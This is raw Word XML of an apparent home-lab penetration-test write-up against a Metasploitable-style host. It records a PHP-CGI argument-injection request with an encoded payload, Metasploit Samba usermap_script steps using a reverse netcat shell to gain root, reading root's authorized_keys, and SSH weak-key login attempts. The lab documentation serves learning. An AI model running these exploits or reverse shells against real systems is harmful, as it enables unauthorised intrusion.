        <w:t>grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE kcP Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc Wv8Vw7bwkf 1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F06C629" w14:textId="78377512" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t xml:space="preserve">ssh -i 57c3115d77c56390332dc5c49978627a-5429 </w:t>
      </w:r>
      <w:hyperlink r:id="rId60" w:history="1">
        <w:r w:rsidR="006706AD" w:rsidRPr="007A58FC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>root@192.168.254.186</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0F35FDA0" w14:textId="79A1A4EF" w:rsidR="006706AD" w:rsidRDefault="006706AD" w:rsidP="00CE3F82">
      <w:r>
        <w:t>But ran in to the same issue I have before</w:t>
      </w:r>
      <w:r w:rsidR="00011CAD">
        <w:t xml:space="preserve"> wit</w:t>
      </w:r>
      <w:r w:rsidR="00B977A1">
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="00011CAD">
        <w:t xml:space="preserve"> the keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E647AE3" w14:textId="77777777" w:rsidR="002119E7" w:rsidRDefault="002119E7" w:rsidP="002119E7">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TWiki XSS and Command Execution Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C0A2AC" w14:textId="77777777" w:rsidR="00CE06FA"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lastRenderedPageBreak/>
        <w:t>cve: CVE-2008-5304</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCB2EE2" w14:textId="1D2D9C0B" w:rsidR="002119E7" w:rsidRDefault="00CE06FA" w:rsidP="00CE06FA">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CVE-2008-5305</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CD811F" w14:textId="77777777" w:rsidR="00CE06FA" w:rsidRDefault="00CE06FA" w:rsidP="00CE06FA">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="F53" w:hAnsi="F53" w:cs="F53"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20D25478" w14:textId="77777777" w:rsidR="002119E7" w:rsidRDefault="002119E7" w:rsidP="00EB0EB8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc155092367"/>
      <w:r>
        <w:t>TWiki is prone to Cross-Site Scripting (XSS) and Command Execution Vulnerabilities.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="0C59604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Successful exploitation could allow execution of arbitrary script code or commands. This could</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCEE752"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let attackers steal cookie-based authentication credentials or compromise the a_ected application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8D0DBB"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5D5489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VendorFix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F33EF99"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Upgrade to version 4.2.4 or later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567B8A4F"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A_ected Software/OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C75EEB6"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TWiki, TWiki version prior to 4.2.4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3353992E" w14:textId="77777777" w:rsidR="002119E7" w:rsidRDefault="002119E7" w:rsidP="002119E7">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Insight</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2928441E"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The _aws are due to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C9F48A"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%URLPARAM}}% variable is not properly sanitized which lets attackers conduct cross-site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B70A1B"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scripting attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770B7B95" w14:textId="77777777" w:rsidR="002119E7" w:rsidRDefault="002119E7" w:rsidP="002119E7">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 %SEARCH}}% variable is not properly sanitised before being used in an eval() call which lets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EEAB23" w14:textId="0E90F1CD" w:rsidR="002119E7" w:rsidRDefault="002119E7" w:rsidP="002119E7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>the attackers execute perl code through eval injection attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7DA41D" w14:textId="77777777" w:rsidR="00EB0EB8" w:rsidRDefault="00EB0EB8" w:rsidP="00EB0EB8">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Test HTTP dangerous methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACDD5EB" w14:textId="4C69DA9D" w:rsidR="00EB0EB8" w:rsidRDefault="00EB0EB8" w:rsidP="0074482D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc155092368"/>
      <w:r>
        <w:t>Miscon</w:t>
      </w:r>
      <w:r w:rsidR="0074482D">
        <w:t>fi</w:t>
      </w:r>
      <w:r>
        <w:t>gured web servers allows remote clients to perform dangerous HTTP methods such as</w:t>
      </w:r>
      <w:r w:rsidR="00983F34">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>PUT and DELETE.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="11E6932A" w14:textId="77777777" w:rsidR="0074482D" w:rsidRDefault="0074482D" w:rsidP="00EB0EB8">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="F53" w:hAnsi="F53" w:cs="F53"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FE128AC"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upload the following files via the PUT method at this web server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE22448"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http://192.168.254.186/dav/puttest268530563.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9690CF" w14:textId="77777777" w:rsidR="00EB0EB8" w:rsidRDefault="00EB0EB8" w:rsidP="00EB0EB8">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We could delete the following files via the DELETE method at this web server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748B6480" w14:textId="243E26F3" w:rsidR="00EB0EB8" w:rsidRDefault="00EB0EB8" w:rsidP="00EB0EB8">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F56" w:hAnsi="F56" w:cs="F56"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http://192.168.254.186/dav/puttest268530563.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032BB30F" w14:textId="11576212" w:rsidR="00A21FEE" w:rsidRDefault="00A21FEE" w:rsidP="00A21FEE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc155092369"/>
      <w:r w:rsidRPr="00A21FEE">
        <w:t xml:space="preserve">PHP-CGI-based setups vulnerability when parsing query string parameters from php </w:t>
      </w:r>
      <w:r>
        <w:t>fil</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21FEE">
        <w:t>les.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="02683DBC"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CVE-2012-1823</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74150CAB"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CVE-2012-2311</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6693DEE0" w14:textId="77777777" w:rsidR="00704CCF" w:rsidRDefault="00704CCF" w:rsidP="00704CCF">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CVE-2012-2336</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D25F46C" w14:textId="51DA37BA" w:rsidR="00704CCF" w:rsidRPr="00704CCF" w:rsidRDefault="00704CCF" w:rsidP="00704CCF">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F56" w:hAnsi="F56" w:cs="F56"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cve: CVE-2012-2335</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B00D90E" w14:textId="77777777" w:rsidR="005277C9" w:rsidRDefault="005277C9" w:rsidP="005277C9">
      <w:r>
        <w:t>Vulnerability Detection Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A93DCD4" w14:textId="77777777" w:rsidR="005277C9" w:rsidRDefault="005277C9" w:rsidP="005277C9">
      <w:r>
        <w:t>By doing the following HTTP POST request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458B9CD6" w14:textId="77777777" w:rsidR="005277C9" w:rsidRDefault="005277C9" w:rsidP="005277C9">
      <w:r>
        <w:t>"HTTP POST" body : &lt;?php phpinfo();?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180CA632" w14:textId="77777777" w:rsidR="005277C9" w:rsidRDefault="005277C9" w:rsidP="005277C9">
      <w:r>
        <w:t>URL : http://192.168.254.186/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38508795" w14:textId="77777777" w:rsidR="005277C9" w:rsidRDefault="005277C9" w:rsidP="005277C9">
      <w:r>
        <w:t>,→75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046E3A8C" w14:textId="77777777" w:rsidR="005277C9" w:rsidRDefault="005277C9" w:rsidP="005277C9">
      <w:r>
        <w:t>,→D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C8B10E" w14:textId="77777777" w:rsidR="005277C9" w:rsidRDefault="005277C9" w:rsidP="005277C9">
      <w:r>
        <w:t>,→%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153D0F4D" w14:textId="77777777" w:rsidR="005277C9" w:rsidRDefault="005277C9" w:rsidP="005277C9">
      <w:r>
        <w:t>,→+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6280ACB3" w14:textId="77777777" w:rsidR="005277C9" w:rsidRDefault="005277C9" w:rsidP="005277C9">
      <w:r>
        <w:t>,→%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6E43E9" w14:textId="77777777" w:rsidR="005277C9" w:rsidRDefault="005277C9" w:rsidP="005277C9">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>,→63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A304FA3" w14:textId="77777777" w:rsidR="005277C9" w:rsidRDefault="005277C9" w:rsidP="005277C9">
      <w:r>
        <w:t>,→E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6BDBC8" w14:textId="77777777" w:rsidR="005277C9" w:rsidRDefault="005277C9" w:rsidP="005277C9">
      <w:r>
        <w:t>it was possible to execute the "&lt;?php phpinfo();?&gt;" command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DB7102" w14:textId="77777777" w:rsidR="005277C9" w:rsidRDefault="005277C9" w:rsidP="005277C9">
      <w:r>
        <w:t>Result: &lt;title&gt;phpinfo()&lt;/title&gt;&lt;meta name="ROBOTS" content="NOINDEX,NOFOLLOW,NO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345DFA61" w14:textId="7B8B1C2F" w:rsidR="005277C9" w:rsidRDefault="005277C9" w:rsidP="005277C9">
      <w:r>
        <w:t>,→ARCHIVE" /&gt;&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FD37E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When PHP is used in a CGI-based setup (such as Apache's mod_cgid), the php-cgi receives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B55497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 processed query string parameter as command line arguments which allows command-line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EF4F50"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switches, such as -s, -d or -c to be passed to the php-cgi binary, which can be exploited to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C2930A"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disclose source code and obtain arbitrary code execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178FE4D1"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An example of the -s command, allowing an attacker to view the source code of index.php is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0649D4E9" w14:textId="77777777" w:rsidR="006D55D0" w:rsidRDefault="006D55D0" w:rsidP="006D55D0">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3786AA6B" w14:textId="59799DD9" w:rsidR="006D55D0" w:rsidRPr="005277C9" w:rsidRDefault="006D55D0" w:rsidP="006D55D0">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http://example.com/index.php?-s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D8879E" w14:textId="5F52B662" w:rsidR="00C02EC4" w:rsidRDefault="00C02EC4" w:rsidP="006A7485">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc155092370"/>
      <w:r>
        <w:t>Po</w:t>
      </w:r>
      <w:r w:rsidR="006A7485">
        <w:t>rt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 445</w:t>
      </w:r>
      <w:r w:rsidR="002F6D85">
        <w:t xml:space="preserve"> Samba</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="758F2A20" w14:textId="532AF352" w:rsidR="00CE59DA" w:rsidRDefault="000308AC" w:rsidP="000308AC">
      <w:r>
        <w:t xml:space="preserve">Tested </w:t>
      </w:r>
      <w:r w:rsidR="007535CE">
        <w:t xml:space="preserve">anonymous login </w:t>
      </w:r>
      <w:r w:rsidR="00636FD3">
        <w:t>using smb</w:t>
      </w:r>
      <w:r w:rsidR="00CE59DA">
        <w:t xml:space="preserve">client </w:t>
      </w:r>
      <w:r w:rsidR="005F602F">
        <w:t>-L to list shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF8FDEA" w14:textId="69D0425F" w:rsidR="000308AC" w:rsidRDefault="000308AC" w:rsidP="000308AC">
      <w:r w:rsidRPr="000308AC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7448A99C" wp14:editId="39E8CD12">
            <wp:extent cx="5731510" cy="2466340"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="81768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81235" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId61"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2466340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D553D7" w14:textId="7FF7D2C2" w:rsidR="007535CE" w:rsidRDefault="007535CE" w:rsidP="000308AC">
      <w:r>
        <w:t>Which was successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6936EC05" w14:textId="15543F9E" w:rsidR="004A3182" w:rsidRDefault="004A3182" w:rsidP="000308AC">
      <w:r>
        <w:t xml:space="preserve">I was able to browse to the tmp folder from kali. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A3DFA6" w14:textId="749BC2E4" w:rsidR="004A3182" w:rsidRPr="000308AC" w:rsidRDefault="004A3182" w:rsidP="004A3182">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="004A3182">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1690A688" wp14:editId="473DE39B">
            <wp:extent cx="5063694" cy="2064524"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="610079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9027" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId62"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5063694" cy="2064524"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C0DFB1" w14:textId="05F3615F" w:rsidR="00BA7D80" w:rsidRDefault="009337A3" w:rsidP="009337A3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Run the following in Metasploit download the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319CAC0E" w14:textId="4638BAC1" w:rsidR="002F7A99" w:rsidRDefault="007E20E5" w:rsidP="007D2B9F">
      <w:r>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r w:rsidR="002F7A99" w:rsidRPr="002F7A99">
        <w:t xml:space="preserve">exploit/multi/samba/usermap_script </w:t>
      </w:r>
      <w:r w:rsidR="002F7A99" w:rsidRPr="002F7A99">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C1922A" w14:textId="0AD3F9F5" w:rsidR="00BA7D80" w:rsidRDefault="002F7A99" w:rsidP="007D2B9F">
      <w:r w:rsidRPr="002F7A99">
        <w:t>set</w:t>
      </w:r>
      <w:r w:rsidR="008B6BEB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B6BEB" w:rsidRPr="008B6BEB">
        <w:t xml:space="preserve">RHOST 192.168.254.186  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CCEF71" w14:textId="789ED1A2" w:rsidR="008B6BEB" w:rsidRDefault="007C44ED" w:rsidP="007D2B9F">
      <w:r w:rsidRPr="007C44ED">
        <w:t xml:space="preserve">PAYLOAD cmd/unix/reverse_netcat by default is used then execute by typing “run”  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638A6A22" w14:textId="04360DEA" w:rsidR="004D025B" w:rsidRDefault="004D025B" w:rsidP="007D2B9F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="552DC606" wp14:editId="613332F0">
            <wp:extent cx="5736590" cy="3963035"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="115332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6590" cy="3963035"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79140CD0" w14:textId="16444459" w:rsidR="004D025B" w:rsidRDefault="004D025B" w:rsidP="007D2B9F">
      <w:r>
        <w:t xml:space="preserve">Root </w:t>
      </w:r>
      <w:r w:rsidR="00101BC7">
        <w:t>obtained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088B6216" w14:textId="546EBC11" w:rsidR="00461B33" w:rsidRDefault="00461B33" w:rsidP="007D2B9F">
      <w:r>
        <w:t>Now let’s revisit the SSH issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1082B18A" w14:textId="2ED6609B" w:rsidR="00461B33" w:rsidRDefault="00461B33" w:rsidP="00461B33">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc155092371"/>
      <w:r>
        <w:t>Revisit SSH</w:t>
      </w:r>
      <w:r w:rsidR="00244791">
        <w:t xml:space="preserve"> 23</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="6D27E738" w14:textId="036F9186" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">Lets look at whats going on with the keys run  cat /root/.ssh/authorized_keys   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305B9243" w14:textId="4DDD6D39" w:rsidR="00EB3CAD" w:rsidRDefault="00EB3CAD" w:rsidP="00101BC7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5759BE7D" wp14:editId="4CFE2BA6">
            <wp:extent cx="5730875" cy="554990"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="142477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554990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDE41D6" w14:textId="77777777" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">If use grep  run that key against the extract keys I get a match  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F907733" w14:textId="18FBE991" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t>grep -lr &lt;ke</w:t>
      </w:r>
      <w:r w:rsidR="00AF1CC6">
        <w:t>y&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00AF1CC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DBE2D74" wp14:editId="3E8F3BBE">
            <wp:extent cx="5736590" cy="688975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="209796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6590" cy="688975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0439ABCF" w14:textId="47BEF969" w:rsidR="00101BC7" w:rsidRDefault="00AF1CC6" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">This is a match as the </w:t>
      </w:r>
      <w:r w:rsidR="00405ED6">
        <w:t>walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3380D43B" w14:textId="77777777" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">But fails.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139CEA8A" w14:textId="05DE699B" w:rsidR="00681735" w:rsidRDefault="00681735" w:rsidP="00101BC7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40861EFF" wp14:editId="2BE96C1E">
            <wp:extent cx="5731510" cy="1976930"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="660" name="Picture 660"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660" name="Picture 660" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1976930"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A83105D" w14:textId="13A36FC5" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">The last error </w:t>
      </w:r>
      <w:r w:rsidR="003A3D15">
        <w:t xml:space="preserve">did not expect because I would have expected the target to respond with its fingerprint </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The easy answer is to use ssh with this command: ssh oHostKeyAlgorithms=+ssh-dss msfadmin@192.168.254.186  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3117713D" w14:textId="77777777" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">I could create a public key on the local machine and add keys to SSH authorized_keys file.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B600680" w14:textId="77777777" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">Generate a public-private key pair on your local machine using the ssh-keygen command.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE6586E" w14:textId="77777777" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">This will create two files: a public key file (usually named id_rsa.pub) and a private key file (usually named id_rsa).  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DB5E95" w14:textId="77777777" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">Copy the public key to the remote server using the ssh-copy-id command.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C8662D" w14:textId="77777777" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">This command will automa cally add the public key to the authorized_keys file on the remote server and set the correct permissions.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D04A358" w14:textId="77777777" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">Private Key ssh_login_pubkey  </w:t>
      </w:r>
    </w:p>
